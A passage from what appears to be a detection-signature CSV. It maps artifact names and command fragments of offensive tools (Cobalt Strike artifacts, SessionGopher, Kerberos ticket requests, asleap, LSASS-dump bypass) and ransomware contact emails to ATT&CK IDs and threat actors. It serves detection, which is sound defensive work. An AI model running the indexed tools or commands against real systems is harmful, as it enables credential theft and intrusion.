- T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34096" "*artifact64.dll*",".{0,1000}artifact64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 
- T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34097" "*artifact64.exe*",".{0,1000}artifact64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34098" "*artifact64.x64.dll*",".{0,1000}artifact64\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34099" "*artifact64big.exe*",".{0,1000}artifact64big\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34100" "*artifact64big.x64.dll*",".{0,1000}artifact64big\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34101" "*artifact64svc.exe*",".{0,1000}artifact64svc\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34102" "*artifact64svcbig.exe*",".{0,1000}artifact64svcbig\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34103" "*artifactbig64.exe*",".{0,1000}artifactbig64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. 
Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34104" "*artifactuac*.dll*",".{0,1000}artifactuac.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 
- T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34105" "*artofpwn.com*",".{0,1000}artofpwn\.com.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#email","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","34106" "*aruba2john.py*",".{0,1000}aruba2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","34107" "*Arvanaghi/SessionGopher*",".{0,1000}Arvanaghi\/SessionGopher.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","34108" "*arvato@atomsilo.com*",".{0,1000}arvato\@atomsilo\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34109" "*AS 'Login that can be impersonated'*",".{0,1000}AS\s\'Login\sthat\scan\sbe\simpersonated\'.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","34110" "*as 'Owner that can be 
impersonated'*",".{0,1000}as\s\'Owner\sthat\scan\sbe\simpersonated\'.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","34111" "*ASBBypass.ps1*",".{0,1000}ASBBypass\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","34113" "*ASBBypass.ps1*",".{0,1000}ASBBypass\.ps1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","34114" "*ASBBypass.ps1*",".{0,1000}ASBBypass\.ps1.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","34115" "*asgardmaster5@protonmail.com*",".{0,1000}asgardmaster5\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34116" "*Ashley.Mowat@protonmail.com*",".{0,1000}Ashley\.Mowat\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34117" "*Ask to take over RDP session if another used is logged in (workstation)*",".{0,1000}Ask\sto\stake\sover\sRDP\ssession\sif\sanother\sused\sis\slogged\sin\s\(workstation\).{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","34118" "*asktgs.x64.o*",".{0,1000}asktgs\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","34119" "*asktgt /user* /domain:* /password:* /opsec /force /ptt*",".{0,1000}asktgt\s\/user.{0,1000}\s\/domain\:.{0,1000}\s\/password\:.{0,1000}\s\/opsec\s\/force\s\/ptt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","34120" "*asleap -C * -R *",".{0,1000}asleap\s\-C\s.{0,1000}\s\-R\s.{0,1000}","offensive_tool_keyword","asleap","Exploiting a serious deficiency in proprietary Cisco LEAP networks","T1078 - T1557 - T1040","TA0006 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/joswr1ght/asleap","1","0","N/A","N/A","10","1","88","20","2021-06-21T00:13:17Z","2016-08-30T13:00:21Z","34121" "*asleap -r *.dump *",".{0,1000}asleap\s\-r\s.{0,1000}\.dump\s.{0,1000}","offensive_tool_keyword","asleap","Exploiting a serious deficiency in proprietary Cisco LEAP networks","T1078 - T1557 - T1040","TA0006 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/joswr1ght/asleap","1","0","N/A","N/A","10","1","88","20","2021-06-21T00:13:17Z","2016-08-30T13:00:21Z","34122" "*asp-jinja-obfuscator.py*",".{0,1000}asp\-jinja\-obfuscator\.py.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","1","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","34123" "*ASR_bypass_to_dump_LSASS.cs*",".{0,1000}ASR_bypass_to_dump_LSASS\.cs.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential 
